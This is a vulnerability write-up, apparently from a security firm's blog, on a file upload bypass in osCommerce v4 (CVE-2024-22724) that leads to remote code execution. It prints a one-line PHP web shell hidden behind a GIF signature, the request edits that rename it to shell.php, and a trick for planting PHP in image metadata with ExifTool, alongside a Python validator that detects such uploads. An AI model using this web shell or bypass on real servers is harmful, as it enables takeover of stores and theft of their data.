OsCommerce v4 RCE: Unveiling the file upload bypass threat

Written by Daniel Barros


In my recent research, I identified a critical vulnerability in osCommerce v4, specifically a Remote Code Execution (RCE) vulnerability enabled by bypassing file upload restrictions. I’ve always enjoyed testing file upload bypass techniques in my assessments.

Vulnerabilities Identified in OsCommerce Version 4

CVE-2024-22724 was assigned to this vulnerability.

The issue came to light while modifying the administrator's profile picture. When I altered the file extension from shell.gif to shell.php in the request shown below, the application accepted the file with the modified extension as if it had passed validation.


I started the upload of the malicious GIF file by clicking Edit on the profile picture.


The request was intercepted with Burp Suite, as shown in the image below. In the intercepted request I changed the file extension from shell.gif to shell.php. The file itself contained the following payload:

GIF89a;
<?
system($_GET['cmd']);
?>

The payload above is a short PHP script that executes whatever system command arrives in the cmd parameter of the GET request. The leading GIF89a; is the GIF file signature: a check that only inspects the first bytes of the file treats it as a harmless image. This is a classic way of getting past an upload filter that trusts the file signature and the client-supplied name instead of the full content, and it ends in arbitrary command execution on the server.

After the upload, I observed that the image appeared successfully loaded, yet the file extension remained shell.gif.

However, after clicking Update and intercepting that request as well, I found that the avatar parameter carried the filename shell.gif. I changed it to shell.php, and the application accepted the file under that name.

By requesting shell.php from the directory where it was stored, I achieved Remote Code Execution (RCE). For instance, running cat /etc/passwd through the cmd parameter showed that server commands could be executed and sensitive data potentially read.

Unlocking Remote Code Execution (RCE) Magic: Harnessing ExifTool Metadata Trickery

I will share a clever trick for achieving Remote Code Execution (RCE) via ExifTool metadata. This handy method can produce powerful outcomes.

Imagine you have an image file and want to embed PHP code into its metadata using ExifTool.

Let’s say you insert the following code into the comment field:

<?php echo system('id');?>

This code, upon execution, will display the output of the ‘id’ command, providing information about the current user and their privileges.

Once you’ve embedded this PHP code into the metadata of your image file, things start to get interesting. If the application fails to sanitize or filter the metadata of uploaded files adequately, it could inadvertently execute the PHP code embedded in the image’s metadata.

Image successfully loads!


Let’s imagine intercepting the request using a tool like Burp Suite. Subsequently, we can scrutinize the response to ascertain whether our PHP code was executed successfully. If it did, we’ll witness the output of the ‘id’ command directly in the response, confirming our achievement of Remote Code Execution.
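Both tricks in this post rely on the same gap: the server trusts the client-supplied filename and a plausible image signature, and never looks at the rest of the body or at the name it later stores. The Python below is an added example, not code from osCommerce or from this post, showing the checks an avatar upload handler needs against the extension swap described in the first section and the PHP hidden in a GIF comment described in the ExifTool section. The function names, the issued-name format and every sample byte string are constructed for this illustration; the polyglot sample reproduces the shape of the payload quoted above.

```python
"""Added example: server-side checks for an avatar upload handler.

Not osCommerce code and not from the original post; all sample bytes and
names below are constructed for illustration.
"""
import os
import re
import secrets

# Extensions the avatar feature accepts, each mapped to the leading bytes
# (magic) a genuine file of that type must begin with.
ALLOWED_TYPES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Any PHP open tag: "<?php", the short "<?" and the echo form "<?=".
# "<?xml" is excluded so an XML declaration alone does not trigger it.
PHP_OPEN_TAG = re.compile(rb"<\?(?!xml\b)")

# Names this server issues: 32 hex characters plus an allow-listed extension.
ISSUED_NAME = re.compile(r"^[0-9a-f]{32}\.(gif|png|jpe?g)$")


def validate_upload(client_filename: str, data: bytes) -> tuple[bool, str]:
    """Decide whether an uploaded body may be stored at all.

    The client-supplied filename is consulted only for the claimed type; it
    is never used to name the stored file.
    """
    ext = os.path.splitext(client_filename)[1].lstrip(".").lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension '{ext or '<none>'}' not allowed"
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "magic bytes do not match the claimed type"
    # A valid signature is not enough: the body after it may be a polyglot
    # ("GIF89a;" followed by PHP) or carry PHP inside a metadata comment.
    hit = PHP_OPEN_TAG.search(data)
    if hit:
        return False, f"php open tag at offset {hit.start()}"
    return True, "ok"


def storage_name(ext: str) -> str:
    """Server-chosen name for the stored file; the request has no say in it."""
    return secrets.token_hex(16) + "." + ext


def accept_avatar_reference(requested: str, issued: set[str]) -> bool:
    """Second request of the flow: the 'avatar' field may only refer back to a
    name this server issued earlier, never to an arbitrary filename."""
    return ISSUED_NAME.fullmatch(requested) is not None and requested in issued


# --- constructed samples -------------------------------------------------
# Shape of the payload from the post: a GIF signature followed by PHP.
POLYGLOT_GIF = b"GIF89a;\n<?\nsystem($_GET['cmd']);\n?>\n"

_LSD = b"\x01\x00\x01\x00\x00\x00\x00"                  # 1x1 screen, no colour table
_IMAGE = (b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"  # image descriptor
          + b"\x02\x02\x44\x01\x00")                    # minimal LZW data sub-blocks
_TRAILER = b"\x3b"

# A genuine 1x1 GIF with nothing else in it.
CLEAN_GIF = b"GIF89a" + _LSD + _IMAGE + _TRAILER

# The same GIF carrying a Comment Extension (0x21 0xFE), the block in which
# a GIF comment such as the one set with ExifTool in the post is stored.
_COMMENT = b"<?php echo system('id');?>"
COMMENT_GIF = (b"GIF89a" + _LSD
               + b"\x21\xfe" + bytes([len(_COMMENT)]) + _COMMENT + b"\x00"
               + _IMAGE + _TRAILER)


if __name__ == "__main__":
    for name, body in [("shell.php", POLYGLOT_GIF), ("shell.gif", POLYGLOT_GIF),
                       ("avatar.gif", CLEAN_GIF), ("avatar.gif", COMMENT_GIF)]:
        print(name, validate_upload(name, body))
    issued = {storage_name("gif")}
    print(accept_avatar_reference("shell.php", issued),
          accept_avatar_reference(next(iter(issued)), issued))
```

The scan for a PHP open tag is deliberately format-agnostic, so it catches the tag wherever a metadata tool put it rather than only in a GIF comment block; the trade-off is that a legitimate image whose pixel data happens to contain the two bytes `<?` is rejected, which for avatars is an acceptable false positive. The checks that close the hole for good are the ones outside this snippet: re-encode the image with an image library before storing it, keep the upload directory outside the document root or with script execution disabled, and have the second request reference only a name the server issued, as accept_avatar_reference does.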

You now possess a cheeky hack to pull off RCE via ExifTool metadata. Get ready to dance your way through those digital loopholes! Happy hacking, and may your exploits be as sweet as a cupc4k3 emoji 🧁

Author

Hakai logo.